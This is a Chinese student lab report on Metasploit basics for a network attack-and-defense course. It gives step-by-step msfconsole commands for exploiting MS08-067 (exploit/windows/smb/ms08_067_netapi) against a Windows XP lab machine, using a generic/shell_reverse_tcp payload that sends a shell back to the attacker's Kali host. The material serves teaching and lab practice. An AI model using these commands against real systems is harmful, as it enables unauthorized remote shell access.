1. 程式人生 > >2017-2018-2 20155310『網絡對抗技術』Exp5:MSF基礎應用

2017-2018-2 20155310『網絡對抗技術』Exp5:MSF基礎應用

set ons http load options 進行 中文 實驗 滲透測試

2017-2018-2 20155310『網絡對抗技術』Exp5:MSF基礎應用

基礎問題回答

用自己的話解釋什麽是exploit,payload,encode

exploit:由攻擊者或滲透測試者利用一個系統、應用或服務中的安全漏洞

payload:攻擊載荷,如後門等攻擊代碼。

encode:指編碼,對我們的程序或代碼進行偽裝。

實驗內容

一個主動攻擊實踐,如ms08_067

1.啟用msf終端msfconsole

2.然後使用search命令搜索該漏洞對應的模塊:search ms08_067

3.滲透攻擊模塊路徑名為“exploit/windows/smb/ms08_067_netapi” 包含四部分:模塊類型、目標平臺、目標服務和模塊名字。

use exploit/windows/smb/ms08_067_netapi

1.查看信息:

show payloads

2.選擇攻擊載荷:

set payload generic/shell_reverse_tcp

技術分享圖片

3.查看配置滲透攻擊所需的配置項:

show options

4.查看滲透攻擊模塊所能成功滲透攻擊的目標平臺

show targets

技術分享圖片

5.用show payloads查看可以供我們使用的攻擊載荷:
技術分享圖片

6.從中找到一個可用的攻擊載荷generic/shell_reverse_tcp,用set payload generic/shell_reverse_tcp設置payload:
技術分享圖片

7.用show options查看需要設置的參數

?這裏需要設置RHOST(靶機IP)和LHOST(Kali的IP),使用set 需設置的參數名 參數值命令即可設置:
技術分享圖片

8.設置target選項目標(例如我攻擊系統為WIN xp 中文簡體 SP2,所以選擇10)

?確認參數設置無誤後,用exploit指令開始攻擊:
技術分享圖片

9.攻擊成功後會獲取靶機的shell,可以對其進行操作:
技術分享圖片

2017-2018-2 20155310『網絡對抗技術』Exp5:MSF基礎應用